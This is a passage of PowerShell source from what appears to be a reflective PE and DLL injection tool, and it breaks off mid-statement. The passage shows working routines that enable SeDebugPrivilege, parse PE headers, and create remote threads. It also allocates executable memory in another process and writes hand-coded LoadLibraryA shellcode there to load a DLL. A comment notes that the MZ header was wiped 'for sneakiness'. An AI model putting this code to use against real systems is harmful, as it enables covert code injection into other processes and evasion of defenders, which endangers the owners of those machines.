[BitConverter]::GetBytes($Value2)\n\t\t[Byte[]]$FinalBytes = [BitConverter]::GetBytes([UInt64]0)\n\n\t\tif ($Value1Bytes.Count -eq $Value2Bytes.Count)\n\t\t{\n\t\t\t$CarryOver = 0\n\t\t\tfor ($i = 0; $i -lt $Value1Bytes.Count; $i++)\n\t\t\t{\n\t\t\t\t$Val = $Value1Bytes[$i] - $CarryOver\n\t\t\t\t#Sub bytes\n\t\t\t\tif ($Val -lt $Value2Bytes[$i])\n\t\t\t\t{\n\t\t\t\t\t$Val += 256\n\t\t\t\t\t$CarryOver = 1\n\t\t\t\t}\n\t\t\t\telse\n\t\t\t\t{\n\t\t\t\t\t$CarryOver = 0\n\t\t\t\t}\n\t\t\t\t\n\t\t\t\t\n\t\t\t\t[UInt16]$Sum = $Val - $Value2Bytes[$i]\n\n\t\t\t\t$FinalBytes[$i] = $Sum -band 0x00FF\n\t\t\t}\n\t\t}\n\t\telse\n\t\t{\n\t\t\tThrow \"Cannot subtract bytearrays of different sizes\"\n\t\t}\n\t\t\n\t\treturn [BitConverter]::ToInt64($FinalBytes, 0)\n\t}\n\t\n\n\tFunction Add-SignedIntAsUnsigned\n\t{\n\t\tParam(\n\t\t[Parameter(Position = 0, Mandatory = $true)]\n\t\t[Int64]\n\t\t$Value1,\n\t\t\n\t\t[Parameter(Position = 1, Mandatory = $true)]\n\t\t[Int64]\n\t\t$Value2\n\t\t)\n\t\t\n\t\t[Byte[]]$Value1Bytes = [BitConverter]::GetBytes($Value1)\n\t\t[Byte[]]$Value2Bytes = [BitConverter]::GetBytes($Value2)\n\t\t[Byte[]]$FinalBytes = [BitConverter]::GetBytes([UInt64]0)\n\n\t\tif ($Value1Bytes.Count -eq $Value2Bytes.Count)\n\t\t{\n\t\t\t$CarryOver = 0\n\t\t\tfor ($i = 0; $i -lt $Value1Bytes.Count; $i++)\n\t\t\t{\n\t\t\t\t#Add bytes\n\t\t\t\t[UInt16]$Sum = $Value1Bytes[$i] + $Value2Bytes[$i] + $CarryOver\n\n\t\t\t\t$FinalBytes[$i] = $Sum -band 0x00FF\n\t\t\t\t\n\t\t\t\tif (($Sum -band 0xFF00) -eq 0x100)\n\t\t\t\t{\n\t\t\t\t\t$CarryOver = 1\n\t\t\t\t}\n\t\t\t\telse\n\t\t\t\t{\n\t\t\t\t\t$CarryOver = 0\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\t\telse\n\t\t{\n\t\t\tThrow \"Cannot add bytearrays of different sizes\"\n\t\t}\n\t\t\n\t\treturn [BitConverter]::ToInt64($FinalBytes, 0)\n\t}\n\t\n\n\tFunction Compare-Val1GreaterThanVal2AsUInt\n\t{\n\t\tParam(\n\t\t[Parameter(Position = 0, Mandatory = $true)]\n\t\t[Int64]\n\t\t$Value1,\n\t\t\n\t\t[Parameter(Position = 1, Mandatory = $true)]\n\t\t[Int64]\n\t\t$Value2\n\t\t)\n\t\t\n\t\t[Byte[]]$Value1Bytes = [BitConverter]::GetBytes($Value1)\n\t\t[Byte[]]$Value2Bytes = [BitConverter]::GetBytes($Value2)\n\n\t\tif ($Value1Bytes.Count -eq $Value2Bytes.Count)\n\t\t{\n\t\t\tfor ($i = $Value1Bytes.Count-1; $i -ge 0; $i--)\n\t\t\t{\n\t\t\t\tif ($Value1Bytes[$i] -gt $Value2Bytes[$i])\n\t\t\t\t{\n\t\t\t\t\treturn $true\n\t\t\t\t}\n\t\t\t\telseif ($Value1Bytes[$i] -lt $Value2Bytes[$i])\n\t\t\t\t{\n\t\t\t\t\treturn $false\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\t\telse\n\t\t{\n\t\t\tThrow \"Cannot compare byte arrays of different size\"\n\t\t}\n\t\t\n\t\treturn $false\n\t}\n\t\n\n\tFunction Convert-UIntToInt\n\t{\n\t\tParam(\n\t\t[Parameter(Position = 0, Mandatory = $true)]\n\t\t[UInt64]\n\t\t$Value\n\t\t)\n\t\t\n\t\t[Byte[]]$ValueBytes = [BitConverter]::GetBytes($Value)\n\t\treturn ([BitConverter]::ToInt64($ValueBytes, 0))\n\t}\n\t\n\t\n\tFunction Test-MemoryRangeValid\n\t{\n\t\tParam(\n\t\t[Parameter(Position = 0, Mandatory = $true)]\n\t\t[String]\n\t\t$DebugString,\n\t\t\n\t\t[Parameter(Position = 1, Mandatory = $true)]\n\t\t[System.Object]\n\t\t$PEInfo,\n\t\t\n\t\t[Parameter(Position = 2, Mandatory = $true)]\n\t\t[IntPtr]\n\t\t$StartAddress,\n\t\t\n\t\t[Parameter(ParameterSetName = \"Size\", Position = 3, Mandatory = $true)]\n\t\t[IntPtr]\n\t\t$Size\n\t\t)\n\t\t\n\t    [IntPtr]$FinalEndAddress = [IntPtr](Add-SignedIntAsUnsigned ($StartAddress) ($Size))\n\t\t\n\t\t$PEEndAddress = $PEInfo.EndAddress\n\t\t\n\t\tif ((Compare-Val1GreaterThanVal2AsUInt ($PEInfo.PEHandle) ($StartAddress)) -eq $true)\n\t\t{\n\t\t\tThrow \"Trying to write to memory smaller than allocated address range. $DebugString\"\n\t\t}\n\t\tif ((Compare-Val1GreaterThanVal2AsUInt ($FinalEndAddress) ($PEEndAddress)) -eq $true)\n\t\t{\n\t\t\tThrow \"Trying to write to memory greater than allocated address range. $DebugString\"\n\t\t}\n\t}\n\t\n\t\n\tFunction Write-BytesToMemory\n\t{\n\t\tParam(\n\t\t\t[Parameter(Position=0, Mandatory = $true)]\n\t\t\t[Byte[]]\n\t\t\t$Bytes,\n\t\t\t\n\t\t\t[Parameter(Position=1, Mandatory = $true)]\n\t\t\t[IntPtr]\n\t\t\t$MemoryAddress\n\t\t)\n\t\n\t\tfor ($Offset = 0; $Offset -lt $Bytes.Length; $Offset++)\n\t\t{\n\t\t\t[System.Runtime.InteropServices.Marshal]::WriteByte($MemoryAddress, $Offset, $Bytes[$Offset])\n\t\t}\n\t}\n\t\n\n\t#Function written by Matt Graeber, Twitter: @mattifestation, Blog: http://www.exploit-monday.com/\n\tFunction Get-DelegateType\n\t{\n\t    Param\n\t    (\n\t        [OutputType([Type])]\n\t        \n\t        [Parameter( Position = 0)]\n\t        [Type[]]\n\t        $Parameters = (New-Object Type[](0)),\n\t        \n\t        [Parameter( Position = 1 )]\n\t        [Type]\n\t        $ReturnType = [Void]\n\t    )\n\n\t    $Domain = [AppDomain]::CurrentDomain\n\t    $DynAssembly = New-Object System.Reflection.AssemblyName('ReflectedDelegate')\n\t    $AssemblyBuilder = $Domain.DefineDynamicAssembly($DynAssembly, [System.Reflection.Emit.AssemblyBuilderAccess]::Run)\n\t    $ModuleBuilder = $AssemblyBuilder.DefineDynamicModule('InMemoryModule', $false)\n\t    $TypeBuilder = $ModuleBuilder.DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate])\n\t    $ConstructorBuilder = $TypeBuilder.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $Parameters)\n\t    $ConstructorBuilder.SetImplementationFlags('Runtime, Managed')\n\t    $MethodBuilder = $TypeBuilder.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $ReturnType, $Parameters)\n\t    $MethodBuilder.SetImplementationFlags('Runtime, Managed')\n\t    \n\t    Write-Output $TypeBuilder.CreateType()\n\t}\n\n\n\t#Function written by Matt Graeber, Twitter: @mattifestation, Blog: http://www.exploit-monday.com/\n\tFunction Get-ProcAddress\n\t{\n\t    Param\n\t    (\n\t        [OutputType([IntPtr])]\n\t    \n\t        [Parameter( Position = 0, Mandatory = $True )]\n\t        [String]\n\t        $Module,\n\t        \n\t        [Parameter( Position = 1, Mandatory = $True )]\n\t        [String]\n\t        $Procedure\n\t    )\n\n\t    # Get a reference to System.dll in the GAC\n\t    $SystemAssembly = [AppDomain]::CurrentDomain.GetAssemblies() |\n\t        Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\\\')[-1].Equals('System.dll') }\n\t    $UnsafeNativeMethods = $SystemAssembly.GetType('Microsoft.Win32.UnsafeNativeMethods')\n\t    # Get a reference to the GetModuleHandle and GetProcAddress methods\n\t    $GetModuleHandle = $UnsafeNativeMethods.GetMethod('GetModuleHandle')\n\t    $GetProcAddress = $UnsafeNativeMethods.GetMethod('GetProcAddress')\n\t    # Get a handle to the module specified\n\t    $Kern32Handle = $GetModuleHandle.Invoke($null, @($Module))\n\t    $tmpPtr = New-Object IntPtr\n\t    $HandleRef = New-Object System.Runtime.InteropServices.HandleRef($tmpPtr, $Kern32Handle)\n\n\t    # Return the address of the function\n\t    Write-Output $GetProcAddress.Invoke($null, @([System.Runtime.InteropServices.HandleRef]$HandleRef, $Procedure))\n\t}\n\t\n\t\n\tFunction Enable-SeDebugPrivilege\n\t{\n\t\tParam(\n\t\t[Parameter(Position = 1, Mandatory = $true)]\n\t\t[System.Object]\n\t\t$Win32Functions,\n\t\t\n\t\t[Parameter(Position = 2, Mandatory = $true)]\n\t\t[System.Object]\n\t\t$Win32Types,\n\t\t\n\t\t[Parameter(Position = 3, Mandatory = $true)]\n\t\t[System.Object]\n\t\t$Win32Constants\n\t\t)\n\t\t\n\t\t[IntPtr]$ThreadHandle = $Win32Functions.GetCurrentThread.Invoke()\n\t\tif ($ThreadHandle -eq [IntPtr]::Zero)\n\t\t{\n\t\t\tThrow \"Unable to get the handle to the current thread\"\n\t\t}\n\t\t\n\t\t[IntPtr]$ThreadToken = [IntPtr]::Zero\n\t\t[Bool]$Result = $Win32Functions.OpenThreadToken.Invoke($ThreadHandle, $Win32Constants.TOKEN_QUERY -bor $Win32Constants.TOKEN_ADJUST_PRIVILEGES, $false, [Ref]$ThreadToken)\n\t\tif ($Result -eq $false)\n\t\t{\n\t\t\t$ErrorCode = [System.Runtime.InteropServices.Marshal]::GetLastWin32Error()\n\t\t\tif ($ErrorCode -eq $Win32Constants.ERROR_NO_TOKEN)\n\t\t\t{\n\t\t\t\t$Result = $Win32Functions.ImpersonateSelf.Invoke(3)\n\t\t\t\tif ($Result -eq $false)\n\t\t\t\t{\n\t\t\t\t\tThrow \"Unable to impersonate self\"\n\t\t\t\t}\n\t\t\t\t\n\t\t\t\t$Result = $Win32Functions.OpenThreadToken.Invoke($ThreadHandle, $Win32Constants.TOKEN_QUERY -bor $Win32Constants.TOKEN_ADJUST_PRIVILEGES, $false, [Ref]$ThreadToken)\n\t\t\t\tif ($Result -eq $false)\n\t\t\t\t{\n\t\t\t\t\tThrow \"Unable to OpenThreadToken.\"\n\t\t\t\t}\n\t\t\t}\n\t\t\telse\n\t\t\t{\n\t\t\t\tThrow \"Unable to OpenThreadToken. Error code: $ErrorCode\"\n\t\t\t}\n\t\t}\n\t\t\n\t\t[IntPtr]$PLuid = [System.Runtime.InteropServices.Marshal]::AllocHGlobal([System.Runtime.InteropServices.Marshal]::SizeOf([Type]$Win32Types.LUID))\n\t\t$Result = $Win32Functions.LookupPrivilegeValue.Invoke($null, \"SeDebugPrivilege\", $PLuid)\n\t\tif ($Result -eq $false)\n\t\t{\n\t\t\tThrow \"Unable to call LookupPrivilegeValue\"\n\t\t}\n\n\t\t[UInt32]$TokenPrivSize = [System.Runtime.InteropServices.Marshal]::SizeOf([Type]$Win32Types.TOKEN_PRIVILEGES)\n\t\t[IntPtr]$TokenPrivilegesMem = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($TokenPrivSize)\n\t\t$TokenPrivileges = [System.Runtime.InteropServices.Marshal]::PtrToStructure($TokenPrivilegesMem, [Type]$Win32Types.TOKEN_PRIVILEGES)\n\t\t$TokenPrivileges.PrivilegeCount = 1\n\t\t$TokenPrivileges.Privileges.Luid = [System.Runtime.InteropServices.Marshal]::PtrToStructure($PLuid, [Type]$Win32Types.LUID)\n\t\t$TokenPrivileges.Privileges.Attributes = $Win32Constants.SE_PRIVILEGE_ENABLED\n\t\t[System.Runtime.InteropServices.Marshal]::StructureToPtr($TokenPrivileges, $TokenPrivilegesMem, $true)\n\n\t\t$Result = $Win32Functions.AdjustTokenPrivileges.Invoke($ThreadToken, $false, $TokenPrivilegesMem, $TokenPrivSize, [IntPtr]::Zero, [IntPtr]::Zero)\n\t\t$ErrorCode = [System.Runtime.InteropServices.Marshal]::GetLastWin32Error() #Need this to get success value or failure value\n\t\tif (($Result -eq $false) -or ($ErrorCode -ne 0))\n\t\t{\n\t\t\t#Throw \"Unable to call AdjustTokenPrivileges. Return value: $Result, Errorcode: $ErrorCode\"   #todo need to detect if already set\n\t\t}\n\t\t\n\t\t[System.Runtime.InteropServices.Marshal]::FreeHGlobal($TokenPrivilegesMem)\n\t}\n\t\n\t\n\tFunction Invoke-CreateRemoteThread\n\t{\n\t\tParam(\n\t\t[Parameter(Position = 1, Mandatory = $true)]\n\t\t[IntPtr]\n\t\t$ProcessHandle,\n\t\t\n\t\t[Parameter(Position = 2, Mandatory = $true)]\n\t\t[IntPtr]\n\t\t$StartAddress,\n\t\t\n\t\t[Parameter(Position = 3, Mandatory = $false)]\n\t\t[IntPtr]\n\t\t$ArgumentPtr = [IntPtr]::Zero,\n\t\t\n\t\t[Parameter(Position = 4, Mandatory = $true)]\n\t\t[System.Object]\n\t\t$Win32Functions\n\t\t)\n\t\t\n\t\t[IntPtr]$RemoteThreadHandle = [IntPtr]::Zero\n\t\t\n\t\t$OSVersion = [Environment]::OSVersion.Version\n\t\t#Vista and Win7\n\t\tif (($OSVersion -ge (New-Object 'Version' 6,0)) -and ($OSVersion -lt (New-Object 'Version' 6,2)))\n\t\t{\n\t\t\tWrite-Verbose \"Windows Vista/7 detected, using NtCreateThreadEx. Address of thread: $StartAddress\"\n\t\t\t$RetVal= $Win32Functions.NtCreateThreadEx.Invoke([Ref]$RemoteThreadHandle, 0x1FFFFF, [IntPtr]::Zero, $ProcessHandle, $StartAddress, $ArgumentPtr, $false, 0, 0xffff, 0xffff, [IntPtr]::Zero)\n\t\t\t$LastError = [System.Runtime.InteropServices.Marshal]::GetLastWin32Error()\n\t\t\tif ($RemoteThreadHandle -eq [IntPtr]::Zero)\n\t\t\t{\n\t\t\t\tThrow \"Error in NtCreateThreadEx. Return value: $RetVal. LastError: $LastError\"\n\t\t\t}\n\t\t}\n\t\t#XP/Win8\n\t\telse\n\t\t{\n\t\t\tWrite-Verbose \"Windows XP/8 detected, using CreateRemoteThread. Address of thread: $StartAddress\"\n\t\t\t$RemoteThreadHandle = $Win32Functions.CreateRemoteThread.Invoke($ProcessHandle, [IntPtr]::Zero, [UIntPtr][UInt64]0xFFFF, $StartAddress, $ArgumentPtr, 0, [IntPtr]::Zero)\n\t\t}\n\t\t\n\t\tif ($RemoteThreadHandle -eq [IntPtr]::Zero)\n\t\t{\n\t\t\tWrite-Verbose \"Error creating remote thread, thread handle is null\"\n\t\t}\n\t\t\n\t\treturn $RemoteThreadHandle\n\t}\n\n\t\n\n\tFunction Get-ImageNtHeaders\n\t{\n\t\tParam(\n\t\t[Parameter(Position = 0, Mandatory = $true)]\n\t\t[IntPtr]\n\t\t$PEHandle,\n\t\t\n\t\t[Parameter(Position = 1, Mandatory = $true)]\n\t\t[System.Object]\n\t\t$Win32Types\n\t\t)\n\t\t\n\t\t$NtHeadersInfo = New-Object System.Object\n\t\t\n\t\t#Normally would validate DOSHeader here, but we did it before this function was called and then destroyed 'MZ' for sneakiness\n\t\t$dosHeader = [System.Runtime.InteropServices.Marshal]::PtrToStructure($PEHandle, [Type]$Win32Types.IMAGE_DOS_HEADER)\n\n\t\t#Get IMAGE_NT_HEADERS\n\t\t[IntPtr]$NtHeadersPtr = [IntPtr](Add-SignedIntAsUnsigned ([Int64]$PEHandle) ([Int64][UInt64]$dosHeader.e_lfanew))\n\t\t$NtHeadersInfo | Add-Member -MemberType NoteProperty -Name NtHeadersPtr -Value $NtHeadersPtr\n\t\t$imageNtHeaders64 = [System.Runtime.InteropServices.Marshal]::PtrToStructure($NtHeadersPtr, [Type]$Win32Types.IMAGE_NT_HEADERS64)\n\t\t\n\t\t#Make sure the IMAGE_NT_HEADERS checks out. If it doesn't, the data structure is invalid. This should never happen.\n\t    if ($imageNtHeaders64.Signature -ne 0x00004550)\n\t    {\n\t        throw \"Invalid IMAGE_NT_HEADER signature.\"\n\t    }\n\t\t\n\t\tif ($imageNtHeaders64.OptionalHeader.Magic -eq 'IMAGE_NT_OPTIONAL_HDR64_MAGIC')\n\t\t{\n\t\t\t$NtHeadersInfo | Add-Member -MemberType NoteProperty -Name IMAGE_NT_HEADERS -Value $imageNtHeaders64\n\t\t\t$NtHeadersInfo | Add-Member -MemberType NoteProperty -Name PE64Bit -Value $true\n\t\t}\n\t\telse\n\t\t{\n\t\t\t$ImageNtHeaders32 = [System.Runtime.InteropServices.Marshal]::PtrToStructure($NtHeadersPtr, [Type]$Win32Types.IMAGE_NT_HEADERS32)\n\t\t\t$NtHeadersInfo | Add-Member -MemberType NoteProperty -Name IMAGE_NT_HEADERS -Value $imageNtHeaders32\n\t\t\t$NtHeadersInfo | Add-Member -MemberType NoteProperty -Name PE64Bit -Value $false\n\t\t}\n\t\t\n\t\treturn $NtHeadersInfo\n\t}\n\n\n\t#This function will get the information needed to allocated space in memory for the PE\n\tFunction Get-PEBasicInfo\n\t{\n\t\tParam(\n\t\t[Parameter( Position = 0, Mandatory = $true )]\n\t\t[Byte[]]\n\t\t$PEBytes,\n\t\t\n\t\t[Parameter(Position = 1, Mandatory = $true)]\n\t\t[System.Object]\n\t\t$Win32Types\n\t\t)\n\t\t\n\t\t$PEInfo = New-Object System.Object\n\t\t\n\t\t#Write the PE to memory temporarily so I can get information from it. This is not it's final resting spot.\n\t\t[IntPtr]$UnmanagedPEBytes = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($PEBytes.Length)\n\t\t[System.Runtime.InteropServices.Marshal]::Copy($PEBytes, 0, $UnmanagedPEBytes, $PEBytes.Length) | Out-Null\n\t\t\n\t\t#Get NtHeadersInfo\n\t\t$NtHeadersInfo = Get-ImageNtHeaders -PEHandle $UnmanagedPEBytes -Win32Types $Win32Types\n\t\t\n\t\t#Build a structure with the information which will be needed for allocating memory and writing the PE to memory\n\t\t$PEInfo | Add-Member -MemberType NoteProperty -Name 'PE64Bit' -Value ($NtHeadersInfo.PE64Bit)\n\t\t$PEInfo | Add-Member -MemberType NoteProperty -Name 'OriginalImageBase' -Value ($NtHeadersInfo.IMAGE_NT_HEADERS.OptionalHeader.ImageBase)\n\t\t$PEInfo | Add-Member -MemberType NoteProperty -Name 'SizeOfImage' -Value ($NtHeadersInfo.IMAGE_NT_HEADERS.OptionalHeader.SizeOfImage)\n\t\t$PEInfo | Add-Member -MemberType NoteProperty -Name 'SizeOfHeaders' -Value ($NtHeadersInfo.IMAGE_NT_HEADERS.OptionalHeader.SizeOfHeaders)\n\t\t$PEInfo | Add-Member -MemberType NoteProperty -Name 'DllCharacteristics' -Value ($NtHeadersInfo.IMAGE_NT_HEADERS.OptionalHeader.DllCharacteristics)\n\t\t\n\t\t#Free the memory allocated above, this isn't where we allocate the PE to memory\n\t\t[System.Runtime.InteropServices.Marshal]::FreeHGlobal($UnmanagedPEBytes)\n\t\t\n\t\treturn $PEInfo\n\t}\n\n\n\t#PEInfo must contain the following NoteProperties:\n\t#\tPEHandle: An IntPtr to the address the PE is loaded to in memory\n\tFunction Get-PEDetailedInfo\n\t{\n\t\tParam(\n\t\t[Parameter( Position = 0, Mandatory = $true)]\n\t\t[IntPtr]\n\t\t$PEHandle,\n\t\t\n\t\t[Parameter(Position = 1, Mandatory = $true)]\n\t\t[System.Object]\n\t\t$Win32Types,\n\t\t\n\t\t[Parameter(Position = 2, Mandatory = $true)]\n\t\t[System.Object]\n\t\t$Win32Constants\n\t\t)\n\t\t\n\t\tif ($PEHandle -eq $null -or $PEHandle -eq [IntPtr]::Zero)\n\t\t{\n\t\t\tthrow 'PEHandle is null or IntPtr.Zero'\n\t\t}\n\t\t\n\t\t$PEInfo = New-Object System.Object\n\t\t\n\t\t#Get NtHeaders information\n\t\t$NtHeadersInfo = Get-ImageNtHeaders -PEHandle $PEHandle -Win32Types $Win32Types\n\t\t\n\t\t#Build the PEInfo object\n\t\t$PEInfo | Add-Member -MemberType NoteProperty -Name PEHandle -Value $PEHandle\n\t\t$PEInfo | Add-Member -MemberType NoteProperty -Name IMAGE_NT_HEADERS -Value ($NtHeadersInfo.IMAGE_NT_HEADERS)\n\t\t$PEInfo | Add-Member -MemberType NoteProperty -Name NtHeadersPtr -Value ($NtHeadersInfo.NtHeadersPtr)\n\t\t$PEInfo | Add-Member -MemberType NoteProperty -Name PE64Bit -Value ($NtHeadersInfo.PE64Bit)\n\t\t$PEInfo | Add-Member -MemberType NoteProperty -Name 'SizeOfImage' -Value ($NtHeadersInfo.IMAGE_NT_HEADERS.OptionalHeader.SizeOfImage)\n\t\t\n\t\tif ($PEInfo.PE64Bit -eq $true)\n\t\t{\n\t\t\t[IntPtr]$SectionHeaderPtr = [IntPtr](Add-SignedIntAsUnsigned ([Int64]$PEInfo.NtHeadersPtr) ([System.Runtime.InteropServices.Marshal]::SizeOf([Type]$Win32Types.IMAGE_NT_HEADERS64)))\n\t\t\t$PEInfo | Add-Member -MemberType NoteProperty -Name SectionHeaderPtr -Value $SectionHeaderPtr\n\t\t}\n\t\telse\n\t\t{\n\t\t\t[IntPtr]$SectionHeaderPtr = [IntPtr](Add-SignedIntAsUnsigned ([Int64]$PEInfo.NtHeadersPtr) ([System.Runtime.InteropServices.Marshal]::SizeOf([Type]$Win32Types.IMAGE_NT_HEADERS32)))\n\t\t\t$PEInfo | Add-Member -MemberType NoteProperty -Name SectionHeaderPtr -Value $SectionHeaderPtr\n\t\t}\n\t\t\n\t\tif (($NtHeadersInfo.IMAGE_NT_HEADERS.FileHeader.Characteristics -band $Win32Constants.IMAGE_FILE_DLL) -eq $Win32Constants.IMAGE_FILE_DLL)\n\t\t{\n\t\t\t$PEInfo | Add-Member -MemberType NoteProperty -Name FileType -Value 'DLL'\n\t\t}\n\t\telseif (($NtHeadersInfo.IMAGE_NT_HEADERS.FileHeader.Characteristics -band $Win32Constants.IMAGE_FILE_EXECUTABLE_IMAGE) -eq $Win32Constants.IMAGE_FILE_EXECUTABLE_IMAGE)\n\t\t{\n\t\t\t$PEInfo | Add-Member -MemberType NoteProperty -Name FileType -Value 'EXE'\n\t\t}\n\t\telse\n\t\t{\n\t\t\tThrow \"PE file is not an EXE or DLL\"\n\t\t}\n\t\t\n\t\treturn $PEInfo\n\t}\n\t\n\t\n\tFunction Import-DllInRemoteProcess\n\t{\n\t\tParam(\n\t\t[Parameter(Position=0, Mandatory=$true)]\n\t\t[IntPtr]\n\t\t$RemoteProcHandle,\n\t\t\n\t\t[Parameter(Position=1, Mandatory=$true)]\n\t\t[IntPtr]\n\t\t$ImportDllPathPtr\n\t\t)\n\t\t\n\t\t$PtrSize = [System.Runtime.InteropServices.Marshal]::SizeOf([Type][IntPtr])\n\t\t\n\t\t$ImportDllPath = [System.Runtime.InteropServices.Marshal]::PtrToStringAnsi($ImportDllPathPtr)\n\t\t$DllPathSize = [UIntPtr][UInt64]([UInt64]$ImportDllPath.Length + 1)\n\t\t$RImportDllPathPtr = $Win32Functions.VirtualAllocEx.Invoke($RemoteProcHandle, [IntPtr]::Zero, $DllPathSize, $Win32Constants.MEM_COMMIT -bor $Win32Constants.MEM_RESERVE, $Win32Constants.PAGE_READWRITE)\n\t\tif ($RImportDllPathPtr -eq [IntPtr]::Zero)\n\t\t{\n\t\t\tThrow \"Unable to allocate memory in the remote process\"\n\t\t}\n\n\t\t[UIntPtr]$NumBytesWritten = [UIntPtr]::Zero\n\t\t$Success = $Win32Functions.WriteProcessMemory.Invoke($RemoteProcHandle, $RImportDllPathPtr, $ImportDllPathPtr, $DllPathSize, [Ref]$NumBytesWritten)\n\t\t\n\t\tif ($Success -eq $false)\n\t\t{\n\t\t\tThrow \"Unable to write DLL path to remote process memory\"\n\t\t}\n\t\tif ($DllPathSize -ne $NumBytesWritten)\n\t\t{\n\t\t\tThrow \"Didn't write the expected amount of bytes when writing a DLL path to load to the remote process\"\n\t\t}\n\t\t\n\t\t$Kernel32Handle = $Win32Functions.GetModuleHandle.Invoke(\"kernel32.dll\")\n\t\t$LoadLibraryAAddr = $Win32Functions.GetProcAddress.Invoke($Kernel32Handle, \"LoadLibraryA\") #Kernel32 loaded to the same address for all processes\n\t\t\n\t\t[IntPtr]$DllAddress = [IntPtr]::Zero\n\t\t#For 64bit DLL's, we can't use just CreateRemoteThread to call LoadLibrary because GetExitCodeThread will only give back a 32bit value, but we need a 64bit address\n\t\t#\tInstead, write shellcode while calls LoadLibrary and writes the result to a memory address we specify. Then read from that memory once the thread finishes.\n\t\tif ($PEInfo.PE64Bit -eq $true)\n\t\t{\n\t\t\t#Allocate memory for the address returned by LoadLibraryA\n\t\t\t$LoadLibraryARetMem = $Win32Functions.VirtualAllocEx.Invoke($RemoteProcHandle, [IntPtr]::Zero, $DllPathSize, $Win32Constants.MEM_COMMIT -bor $Win32Constants.MEM_RESERVE, $Win32Constants.PAGE_READWRITE)\n\t\t\tif ($LoadLibraryARetMem -eq [IntPtr]::Zero)\n\t\t\t{\n\t\t\t\tThrow \"Unable to allocate memory in the remote process for the return value of LoadLibraryA\"\n\t\t\t}\n\t\t\t\n\t\t\t\n\t\t\t#Write Shellcode to the remote process which will call LoadLibraryA (Shellcode: LoadLibraryA.asm)\n\t\t\t$LoadLibrarySC1 = @(0x53, 0x48, 0x89, 0xe3, 0x48, 0x83, 0xec, 0x20, 0x66, 0x83, 0xe4, 0xc0, 0x48, 0xb9)\n\t\t\t$LoadLibrarySC2 = @(0x48, 0xba)\n\t\t\t$LoadLibrarySC3 = @(0xff, 0xd2, 0x48, 0xba)\n\t\t\t$LoadLibrarySC4 = @(0x48, 0x89, 0x02, 0x48, 0x89, 0xdc, 0x5b, 0xc3)\n\t\t\t\n\t\t\t$SCLength = $LoadLibrarySC1.Length + $LoadLibrarySC2.Length + $LoadLibrarySC3.Length + $LoadLibrarySC4.Length + ($PtrSize * 3)\n\t\t\t$SCPSMem = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($SCLength)\n\t\t\t$SCPSMemOriginal = $SCPSMem\n\t\t\t\n\t\t\tWrite-BytesToMemory -Bytes $LoadLibrarySC1 -MemoryAddress $SCPSMem\n\t\t\t$SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($LoadLibrarySC1.Length)\n\t\t\t[System.Runtime.InteropServices.Marshal]::StructureToPtr($RImportDllPathPtr, $SCPSMem, $false)\n\t\t\t$SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($PtrSize)\n\t\t\tWrite-BytesToMemory -Bytes $LoadLibrarySC2 -MemoryAddress $SCPSMem\n\t\t\t$SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($LoadLibrarySC2.Length)\n\t\t\t[System.Runtime.InteropServices.Marshal]::StructureToPtr($LoadLibraryAAddr, $SCPSMem, $false)\n\t\t\t$SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($PtrSize)\n\t\t\tWrite-BytesToMemory -Bytes $LoadLibrarySC3 -MemoryAddress $SCPSMem\n\t\t\t$SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($LoadLibrarySC3.Length)\n\t\t\t[System.Runtime.InteropServices.Marshal]::StructureToPtr($LoadLibraryARetMem, $SCPSMem, $false)\n\t\t\t$SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($PtrSize)\n\t\t\tWrite-BytesToMemory -Bytes $LoadLibrarySC4 -MemoryAddress $SCPSMem\n\t\t\t$SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($LoadLibrarySC4.Length)\n\n\t\t\t\n\t\t\t$RSCAddr = $Win32Functions.VirtualAllocEx.Invoke($RemoteProcHandle, [IntPtr]::Zero, [UIntPtr][UInt64]$SCLength, $Win32Constants.MEM_COMMIT -bor $Win32Constants.MEM_RESERVE, $Win32Constants.PAGE_EXECUTE_READWRITE)\n\t\t\tif ($RSCAddr -eq [IntPtr]::Zero)\n\t\t\t{\n\t\t\t\tThrow \"Unable to allocate memory in the remote process for shellcode\"\n\t\t\t}\n\t\t\t\n\t\t\t$Success = $Win32Functions.WriteProcessMemory.Invoke($RemoteProcHandle, $RSCAddr, $SCPSMemOriginal, [UIntPtr][UInt64]$SCLength, [Ref]$NumBytesWritten)\n\t\t\tif (($Success -eq $false) -or ([UInt64]$NumBytesWritten -ne [UInt64]$SCLength))\n\t\t\t{\n\t\t\t\tThrow \"Unable to write shellcode to remote process memory.\"\n\t\t\t}\n\t\t\t\n\t\t\t$RThreadHandle = Invoke-CreateRemoteThread -ProcessHandle $RemoteProcHandle -StartAddress $RSCAddr -Win32Functions $Win32Functions\n\t\t\t$Result = $Win32Functions.WaitForSingleObject.Invoke($RThreadHandle, 20000)\n\t\t\tif ($Result -ne 0)\n\t\t\t{\n\t\t\t\tThrow \"Call to CreateRemoteThread to call GetProcAddress failed.\"\n\t\t\t}\n\t\t\t\n\t\t\t#The shellcode writes the DLL address to memory in the remote process at address $LoadLibraryARetMem, read this memory\n\t\t\t[IntPtr]$ReturnValMem = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($PtrSize)\n\t\t\t$Result = $Win32Functions.ReadProcessMemory.Invoke($RemoteProcHandle, $LoadLibraryARetMem, $ReturnValMem, [UIntPtr][UInt64]$PtrSize, [Ref]$NumBytesWritten)\n\t\t\tif ($Result -eq $false)\n\t\t\t{\n\t\t\t\tThrow \"Call to ReadProcessMemory failed\"\n\t\t\t}\n\t\t\t[IntPtr]$DllAddress = [System.Runtime.InteropServices.Marshal]::PtrToStructure($ReturnValMem, 